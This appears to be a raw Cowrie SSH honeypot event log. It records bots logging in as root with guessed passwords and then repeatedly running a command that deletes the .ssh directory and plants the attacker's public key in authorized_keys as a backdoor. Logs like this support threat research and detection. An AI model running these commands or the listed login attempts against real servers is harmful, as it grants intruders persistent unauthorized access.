{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:02.075734Z","src_ip":"79.124.8.120","session":"bd4ea72b0fb4"}
{"eventid":"cowrie.session.closed","duration":180.1862268447876,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:02.081231Z","src_ip":"79.124.8.120","session":"bd4ea72b0fb4"}
{"eventid":"cowrie.login.success","username":"root","password":"admin2022","message":"login attempt [root/admin2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:04:03.391260Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:04:04.755717Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:04:04.756429Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:04:04.757594Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:05.449420Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:04:06.969408Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T02:04:06.970129Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T02:04:07.683676Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:07.684808Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.session.connect","src_ip":"156.227.27.55","src_port":57822,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f197708cf9","protocol":"ssh","message":"New connection: 156.227.27.55:57822 (1.2.3.4:22) [session: c7f197708cf9]","sensor":"my-vps","timestamp":"2025-08-28T02:04:08.333610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:08.334480Z","src_ip":"156.227.27.55","session":"c7f197708cf9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:09.054127Z","src_ip":"156.227.27.55","session":"c7f197708cf9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T02:04:10.889360Z","src_ip":"156.227.27.55","session":"c7f197708cf9"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:12.601427Z","src_ip":"156.227.27.55","session":"c7f197708cf9"}
{"eventid":"cowrie.session.connect","src_ip":"156.227.27.55","src_port":58744,"dst_ip":"1.2.3.4","dst_port":22,"session":"395398496258","protocol":"ssh","message":"New connection: 156.227.27.55:58744 (1.2.3.4:22) [session: 395398496258]","sensor":"my-vps","timestamp":"2025-08-28T02:04:13.274104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:13.275121Z","src_ip":"156.227.27.55","session":"395398496258"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:13.977087Z","src_ip":"156.227.27.55","session":"395398496258"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:04:16.868216Z","src_ip":"156.227.27.55","session":"395398496258"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:17.580561Z","src_ip":"156.227.27.55","session":"395398496258"}
{"eventid":"cowrie.session.closed","duration":"17.9","message":"Connection lost after 17.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:17.589907Z","src_ip":"156.227.27.55","session":"1bfea273545d"}
{"eventid":"cowrie.session.connect","src_ip":"189.44.109.10","src_port":60650,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab4198fec75","protocol":"ssh","message":"New connection: 189.44.109.10:60650 (1.2.3.4:22) [session: 7ab4198fec75]","sensor":"my-vps","timestamp":"2025-08-28T02:04:40.368664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:40.369563Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:40.599952Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerqwer1","message":"login attempt [root/qwerqwer1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:04:41.563943Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:04:42.046343Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:04:42.047203Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:04:42.048278Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:42.280399Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:04:42.872722Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T02:04:42.873421Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T02:04:43.106349Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:43.107455Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.session.connect","src_ip":"189.44.109.10","src_port":60652,"dst_ip":"1.2.3.4","dst_port":22,"session":"28b13b234e08","protocol":"ssh","message":"New connection: 189.44.109.10:60652 (1.2.3.4:22) [session: 28b13b234e08]","sensor":"my-vps","timestamp":"2025-08-28T02:04:43.339799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:43.340398Z","src_ip":"189.44.109.10","session":"28b13b234e08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:43.573699Z","src_ip":"189.44.109.10","session":"28b13b234e08"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T02:04:44.547161Z","src_ip":"189.44.109.10","session":"28b13b234e08"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:45.783305Z","src_ip":"189.44.109.10","session":"28b13b234e08"}
{"eventid":"cowrie.session.connect","src_ip":"189.44.109.10","src_port":60658,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eb78a0754e1","protocol":"ssh","message":"New connection: 189.44.109.10:60658 (1.2.3.4:22) [session: 2eb78a0754e1]","sensor":"my-vps","timestamp":"2025-08-28T02:04:46.009787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:46.010564Z","src_ip":"189.44.109.10","session":"2eb78a0754e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:46.238500Z","src_ip":"189.44.109.10","session":"2eb78a0754e1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.186599Z","src_ip":"189.44.109.10","session":"2eb78a0754e1"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.414912Z","src_ip":"189.44.109.10","session":"7ab4198fec75"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.416178Z","src_ip":"189.44.109.10","session":"2eb78a0754e1"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.50.33","src_port":48932,"dst_ip":"1.2.3.4","dst_port":22,"session":"b182a84f9eda","protocol":"ssh","message":"New connection: 147.45.50.33:48932 (1.2.3.4:22) [session: b182a84f9eda]","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.601394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.602166Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.621933Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.login.success","username":"root","password":"centos@2023","message":"login attempt [root/centos@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.740568Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:04:47.800978Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.801687Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.802679Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.823216Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:04:47.989988Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
